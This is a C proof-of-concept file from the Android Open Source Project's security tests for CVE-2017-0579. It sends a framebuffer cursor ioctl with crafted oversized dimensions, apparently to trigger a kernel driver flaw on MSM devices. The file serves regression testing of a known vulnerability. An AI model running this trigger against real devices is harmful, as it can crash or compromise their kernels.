Home | History | Annotate | Download | only in CVE-2017-0579 
      1 /*
      2  * Copyright (C) 2017 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 
     18 #include <stdio.h>
     19 #include <sys/stat.h>
     20 #include <sys/types.h>
     21 #include <sys/wait.h>
     22 #include <fcntl.h>
     23 #include <unistd.h>
     24 #include <sys/ioctl.h>
     25 #include <linux/fb.h>
     26 #include <stdlib.h>
     27 #include <string.h>
     28 
     29 #define MSMFB_IOCTL_MAGIC 'm'
     30 #define MSMFB_CURSOR _IOW(MSMFB_IOCTL_MAGIC, 130, struct fb_cursor)
     31 
     32 int call_ioctl(int file_desc, unsigned long request, void* param)
     33 {
     34     int ret_val;
     35 
     36     ret_val = ioctl(file_desc,  request, param);
     37 
     38     if (ret_val < 0) {
     39 	return ret_val;
     40     }
     41     return ret_val;
     42 }
     43 
     44 int test_mdss_msm_fb(int file_desc)
     45 {
     46     int ret_val;
     47     unsigned char* buf = malloc(0x100);
     48     struct fb_cursor cursor;
     49 
     50     memset(&cursor, 0, sizeof(struct fb_cursor ));
     51 
     52     cursor.set = FB_CUR_SETIMAGE;
     53     cursor.enable = 1;
     54     cursor.rop = 0;
     55     cursor.mask = 0;
     56     cursor.hot.x = 0x100;
     57     cursor.hot.y = 0x100;
     58     cursor.image.dx = 1439;
     59     cursor.image.dy = 2559;
     60     cursor.image.width = 0x1000;
     61     cursor.image.height = 0x1000;
     62     cursor.image.fg_color = 0xff;
     63     cursor.image.bg_color = 0xff00;
     64     cursor.image.depth = 32;
     65     cursor.image.data = malloc(cursor.image.width * cursor.image.height * 0x4 );
     66 
     67     ret_val = call_ioctl(file_desc, MSMFB_CURSOR, &cursor );
     68     if(ret_val < 0) {
     69 	return ret_val;
     70     }
     71 
     72     free((void *)cursor.image.data);
     73     free(buf);
     74 
     75     return ret_val;
     76 }
     77 
     78 int main()
     79 {
     80     int file_desc, ret_val;
     81     const char* DEVICE_FILE_NAME = "/dev/graphics/fb0";
     82 
     83     file_desc = open(DEVICE_FILE_NAME, 0);
     84     if (file_desc < 0) {
     85 	return -1;
     86     }
     87 
     88     test_mdss_msm_fb(file_desc);
     89 
     90     close(file_desc);
     91 
     92     return 0;
     93 }
     94